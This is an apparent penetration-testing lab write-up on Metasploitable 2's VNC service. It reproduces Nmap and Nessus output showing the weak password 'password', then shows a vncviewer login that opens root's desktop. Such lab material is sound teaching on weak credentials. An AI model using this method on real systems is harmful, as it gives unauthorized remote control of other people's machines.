The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
5900/tcp open vnc VNC (protocol 3.3)
The information online pertaining to exploiting this VNC service all use brute force techniques; however, the Nessus output for this port is revealing:
Port 5900/tcp
VNC Server ‘password’ PasswordSynopsis
A VNC server running on the remote host is secured with a weak password.Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of ‘password’. A remote, unauthenticated attacker could exploit this to take control of the system.Solution
Secure the VNC service with a strong password.Risk Factor
CriticalCVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)Plugin Information:
Publication date: 2012/08/29, Modification date: 2012/08/29Ports
tcp/5900Nessus logged in using a password of “password”.
As we can see Nessus has done all the hard work discovering the VNC password is password.
All that’s left for us to do is to log in to the VNC service via the attacking Terminal:
# vncviewer 192.168.1.103 Connected to RFB server, using protocol version 3.3 Performing standard VNC authentication Password: Authentication successful Desktop name "root's X desktop (metasploitable:0)" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
And up pops the virtual desktop:
